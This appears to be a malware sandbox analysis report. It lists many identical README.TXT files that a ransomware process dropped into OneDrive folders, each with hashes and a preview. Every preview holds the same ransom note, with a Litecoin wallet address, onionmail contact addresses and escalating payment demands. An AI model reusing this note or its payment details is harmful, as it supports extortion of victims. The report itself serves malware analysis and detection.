                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\fa\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\fil-PH\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ga-IE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\gd\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\gl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\gu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\he\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\hi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\hr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\hu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\id\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ig-NG\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\imageformats\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\images\README.TXT

                                                                                                                                                                                                                                                Download File
